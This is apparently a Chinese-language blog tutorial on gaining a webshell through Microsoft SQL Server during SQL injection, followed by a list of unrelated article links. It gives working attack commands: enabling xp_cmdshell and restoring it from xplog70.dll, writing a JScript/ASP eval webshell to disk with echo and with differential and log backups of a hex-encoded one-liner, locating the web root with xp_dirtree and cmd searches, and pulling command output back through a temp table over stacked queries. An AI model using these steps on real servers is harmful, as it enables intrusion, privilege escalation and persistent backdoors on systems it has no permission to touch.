当前位置：首页 > news >正文

SQL Server从0到1——写shell

news 2026/5/16 18:40:45

xp_cmdshell

查看能否使用xpcmd_shell；

select count(*) from master.dbo.sysobjects where xtype = 'x' and name =  'xp_cmdshell'

直接使用xpcmd_shell执行命令：

EXEC master.dbo.xp_cmdshell 'whoami'

发现居然无法使用

查看是否存在xp_cmdshell:

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

到现在我们知道了，这台mssql支持xp_cmdshell，但没有开启 xp_cmdshell:

启用：
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭：
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

执行命令：

EXEC master.dbo.xp_cmdshell 'whoami'

可以看到这里已经有了system权限主要找到web路径就可以使用cmd目录创建文件，获取web路径在后面有讲解

exec master..xp_cmdshell 'echo ^<%@ Page  Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> >  c:\\666.asp';

注意：如果xp_cmdshell被删除了，需要自己上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是写shell，但是xp_cmdshell更多的是用来提权，具体原因其实思考一下就明白了。。。。

差异备份

生成备份文件：

backup database test to disk = 'c:\bak.bak';--

创建表：

create table [dbo].[test] ([cmd] [image]);

插入一句话：

insert into test(cmd)  values(0x3C25657865637574652872657175657374282261222929253E)

再次备份：

backup database test to disk='C:\567.asp' WITH DIFFERENTIAL,FORMAT;--

就会生成一个asp一句话

LOG备份

1. alter database test set RECOVERY FULL2. create table cmd (a image)3. backup log test to disk = 'c:\test' with init4. insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)5. backup log test to disk = 'c:\test\2.asp'#LOG备份的要求是他的数据库备份过，而且选择恢复模式得是完整模式

路径获取

由于要写webshell，那么必须知道web的路径

1.通过报错获取网站路径

2.使用xp_dirtree获取目录信息：

execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录
execute master..xp_dirtree 'c:',1 //只列c:\文件夹
execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件#一个一个慢慢找

3.通过xpcmd_shell：

exec master..xp_cmdshell 'for /r c:\ %i in (i*.aspx) do @echo %i'

avatar

回显问题：看到这里，可能有很多小伙伴会不耐烦的说，这是我在软件上执行的sql命令，并非真实注入，该如何回显出信息其实我们观察这些payload就可以发现，这些命令并非查询语句，并不能与普通的sql语句在一个语句中，因此想要回显就必须满足，服务器支持堆叠注入

接下来我们的思路就是创建一张临时表来接收命令执行返回的内容，然后我们在通过查临时表来获取数据

创建临时表：

CREATE TABLE tmpTable (tmp1 varchar(8000));

将数据存入表中：

insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig'

获取数据：

select * from tmpTable

SQL Server从0到1——写shell

xp_cmdshell

差异备份

LOG备份

路径获取

相关文章：

SQL Server从0到1——写shell

计算圆弧的起始角度、终止角度和矩形信息并使用drawArc绘制圆弧

C++ Trie树模版及模版题 || Trie字符串统计

Linux基础命令@echo、tail、重定向符

uniapp：签字版、绘画板插件l-signature

Python Pillow(PIL)库的用法介绍

uniapp 【专题详解 -- 时间】云数据库时间类型设计，时间生成、时间格式化渲染（uni-dateformat 组件的使用）

k8s之flink的几种创建方式

应用OpenCV绘制箭头

信息学奥赛一本通1032：大象喝水查

聊聊jvm的direct buffer统计

C/C++ 位段

Peter算法小课堂—树的应用

FineBI：简介

原神单机版【完全无脑搭建】⭐纯单机⭐稳定版

用通俗易懂的方式讲解：万字长文带你入门大模型

Invalid options in vue.config.js: “plugins“ is not allowed

四、C语言中的数组：数组的创建与初始化

html5中各标签的语法格式总结以及属性值说明

力扣（leetcode）第412题Fizz Buzz（Python）

ElevenLabs泰米尔文语音API调用性能突降？紧急修复方案：更换Region为ap-southeast-1后P95延迟从2.4s降至380ms（附curl压测脚本）

抖音弹幕抓取神器：5分钟快速上手与深度应用指南

独立开发者如何利用Taotoken Token Plan套餐优化项目成本

Java SSRF漏洞深度解析：从URLConnection到安全防御实战

罗技鼠标压枪宏配置实战：游戏辅助脚本的完整应用方案

深度拆解：ReID 跨镜跟踪短板，对比镜像视界无感定位优势前言：跨镜追踪的本质不是 “认长相”，而是 “追空间”跨镜连续追踪，是数字孪生、视频孪生、全域安防与实景管控的核心底座能力。

Windows 10/11打印服务总罢工？别急着重装，试试这几招修复Print Spooler自动停止

告别裸机延时！ESP32-C3/ESP32-S3用RMT外设精准驱动WS2812B灯带（Arduino/IDF双平台教程）

告别复制粘贴！用Keil MDK 5.27为GD32F450搭建专属工程模板（附完整文件结构）

观察使用Taotoken Token Plan套餐后月度API成本的变化趋势